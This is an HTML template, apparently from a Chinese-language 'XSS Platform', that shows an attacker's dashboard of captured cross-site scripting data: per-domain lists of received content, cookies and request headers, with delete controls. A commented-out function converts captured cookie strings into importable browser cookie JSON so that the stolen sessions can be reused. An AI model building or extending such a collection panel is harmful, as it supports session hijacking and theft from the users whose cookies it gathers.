<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>XSS Platform</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="{$url.themePath}/css/bootstrap.min.css">
<link rel="stylesheet" href="{$url.themePath}/css/bootstrap-theme.min.css">
<link rel="stylesheet" href="{$url.themePath}/css/css.css">
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://www.bootstrapcdn.com/bootstrap/2.3.1/js/bootstrap.min.js"></script>
{literal}
<style>
#ul1 { margin:0; width:220px; overflow:scroll-x; word-break:break-all}
.ohidden ul { height:18px; overflow:hidden }
a.oall,a.un { text-decoration:none }
td { vertical-align:top }
DIV.meneame {
	PADDING-RIGHT: 3px; PADDING-LEFT: 3px; FONT-SIZE: 80%; PADDING-BOTTOM: 3px; MARGIN: 3px; COLOR: #0073aa; PADDING-TOP: 3px; TEXT-ALIGN: center
}
DIV.meneame A {
	BORDER-RIGHT: #0072ff 1px solid; PADDING-RIGHT: 7px; BACKGROUND-POSITION: 50% bottom; BORDER-TOP: #0072ff 1px solid; PADDING-LEFT: 7px; BACKGROUND-IMAGE: url(../themes/default/css/style/meneamelan.jpg); PADDING-BOTTOM: 5px; BORDER-LEFT: #0072ff 1px solid; COLOR: #0073aa; MARGIN-RIGHT: 3px; PADDING-TOP: 5px; BORDER-BOTTOM: #0072ff 1px solid; TEXT-DECORATION: none
}
DIV.meneame A:hover {
	BORDER-RIGHT: #0072ff 1px solid; BORDER-TOP: #0072ff 1px solid; BACKGROUND-IMAGE: none; BORDER-LEFT: #0072ff 1px solid; COLOR: #0073aa; BORDER-BOTTOM: #0072ff 1px solid; BACKGROUND-COLOR: #ffffff
}
DIV.meneame A:active {
	BORDER-RIGHT: #0072ff 1px solid; BORDER-TOP: #0072ff 1px solid; BACKGROUND-IMAGE: none; BORDER-LEFT: #0072ff 1px solid; COLOR: #0073aa; BORDER-BOTTOM: #0072ff 1px solid; BACKGROUND-COLOR: #ffffff
}
DIV.meneame SPAN.current {
	BORDER-RIGHT: #0073aa 1px solid; PADDING-RIGHT: 7px; BORDER-TOP: #0073aa 1px solid; PADDING-LEFT: 7px; FONT-WEIGHT: bold; PADDING-BOTTOM: 5px; BORDER-LEFT: #0073aa 1px solid; COLOR: #0073aa; MARGIN-RIGHT: 3px; PADDING-TOP: 5px; BORDER-BOTTOM: #0073aa 1px solid; BACKGROUND-COLOR: #94ddff
}
DIV.meneame SPAN.disabled {
	BORDER-RIGHT: #ffe3c6 1px solid; PADDING-RIGHT: 7px; BORDER-TOP: #ffe3c6 1px solid; PADDING-LEFT: 7px; PADDING-BOTTOM: 5px; BORDER-LEFT: #ffe3c6 1px solid; COLOR: #ffe3c6; MARGIN-RIGHT: 3px; PADDING-TOP: 5px; BORDER-BOTTOM: #ffe3c6 1px solid
}
</style>
<script type="text/javascript">
$(document).ready(function(){
	$("a.oall").click(function(){
		if($(this).attr("class")=="oall"){
			$("table tbody tr").attr("class","");
			$("a.un").html("-折叠");
			$(this).attr("class","uall");
			$(this).html("-全部");	
		}else{
			$("table tbody tr").attr("class","ohidden");
			$("a.un").html("+展开");
			$(this).attr("class","oall");
			$(this).html("+全部");	
		}
	});
	$("a.un").click(function(){
		if($(this).parent().parent().attr("class")=="ohidden"){
			$(this).parent().parent().attr("class","");
			$(this).html("-折叠");
		}else{
			$(this).parent().parent().attr("class","ohidden");
			$(this).html("+展开");	
		}
	});
});
function Delete(id,obj,token){
	if(confirm("确定删除吗?")){
		$.post('xss.php?do=project&act=delcontent&r='+Math.random(),{'id':id,'token':token},function(re){
			if(re==1){
				$(obj).parent().parent().remove();
			}
		});
	}
}
function MutiDelete(){
	if(confirm("确定删除选中的内容吗?")){
		var ids=[];
		$.each($(".checon"),function(k,v){
			if($(v).is(":checked")) ids.push($(v).val());
		});
		$.post('xss.php?do=project&act=delcontents&r='+Math.random(),{'ids':ids.join("|"),'token':$("#token").val()},function(re){
			if(re==1){
				$(".checon").parent().parent().remove();
			}
		});
	}
}
function CheckAll(obj){
	if($(obj).is(":checked")){
		$(".checon").attr("checked","checked");
	}else{
		$(".checon").removeAttr("checked");
	}
}
function Copy(obj) { 
  var table = $(obj).parent().parent(); 
  var l = table.find("#location").text(); 
  var c = table.find("#cookie").text(); 
  var t = l.split('//')[1]; 
  t = t.split('/')[0]; 
  var d = ""; 
  var t2 = t.split('.'); 
  for (key in t2) { 
    if (key == 0) { 
      continue; 
    } 
    d = d + '.' + t2[key]; 
  }; 
  var arr = c.split(';'); 
  var data = []; 
  for (var key in arr) { 
    var arr2 = arr[key].split('='); 
    data.push(cookie(d,arr2[0], arr2[1])); 
  } 
  alert(JSON.stringify(data)); 
} 

function cookie(d,n,v) 
{ 
  var row ={     
    "domain" : d, 
    "expirationDate" : Math.round(new Date().getTime()/1000)+3600, 
    "hostOnly" : false, 
    "httpOnly" : false, 
    "name" : n.replace(/^\s+|\s+$/g,''), 
    "path" : "\/", 
    "secure" : false, 
    "session" : false, 
    "storeId" : "0", 
    "value" : v.replace(/^\s+|\s+$/g,'') 
    }; 
  return row; 
}
</script>
{/literal}
</head>
<body>
{include file="header.html"}
<div class="container">
{include file="menus.html"}
<div class="col-sm-9">
          <div class="panel panel-default">
    	<div class="panel-heading">项目内容<a style="font-size:12px; margin-left:10px; float:right;" href="{$url.root}/xss.php?do=project&act=viewcode&id={$project.id}">查看代码</a>
    	<a style="font-size:12px;float:right;" href="{$url.root}/xss.php?do=project&act=setcode&id={$project.id}">配置</a>
		</div>
<table class="table" border="0" cellspacing="0" cellpadding="0">
	<div style="padding: 10px 15px;">
    <h3>
    	项目名称: {$project.title}
    </h3>
    Domain: 
    <select onchange="location.href='{$url.root}/xss.php?do=project&act=view&id={$project.id}&domain='+this.value">
    	<option value="">全部</option>
        {foreach from=$domains item=v}
        <option value="{$v}"{if $v==$domain} selected="selected"{/if}>{$v}</option>
        {/foreach}
    </select> ←←←此处可选择需要查看的域名<br/>
    </div>
	<thead>
		<tr>
			<th width="20"><input type="checkbox" id="checkall" onclick="CheckAll(this)" /></th>
        	<th width="60"><a href="javascript:void(0)" class="oall" style="font-weight:normal">+全部</a></th>
        	<th width="120">时间</th>
        	<th width="220">接收的内容</th>
			<th width="220">Request Headers</th>
            <th width="80">操作</th>
		</tr>
	</thead>
	<tbody>
		{foreach from=$contents item=v}
		<tr class="ohidden">
			<td><input type="checkbox" class="checon" value="{$v.id}" /></td>
        	<td><a href="javascript:void(0)" class="un">+展开</a></td>
        	<td>{$v.addTime|@date_format:"%Y-%m-%d %H:%M:%S"}</td>
			<td>
                <ul id="ul1">
                {foreach from=$v.content key=ck item=c}
                <li>{$ck} : {$c}</li>
                {/foreach}	
                </ul>
            </td>
            <td>
                <ul id="ul1">
                {foreach from=$v.serverContent key=sk item=s}
                <li>{$sk} : {$s}</li>
                {/foreach}	
                </ul>
            </td>
            <td><a href="javascript:void(0)" onclick="Delete('{$v.id}',this,'{$show.user.token}')">删除</a>
			<!--
			&nbsp;&nbsp;<a href="javascript:void(0)" onclick="Copy(this)">复制</a> 
			-->
			</td>
		</tr>
		{/foreach}
	</tbody>
</table>
		<div class="meneame">
			{$pagers}<a >共{$pages}页</a>
		</div>
<div style="padding:5px 10px">选中项操作：<a href="javascript:void(0)" onclick="MutiDelete()">删除</a></div>
</div>
</div>
</div>
<input type="hidden" id="token" value="{$show.user.token}" />
</body>
</html>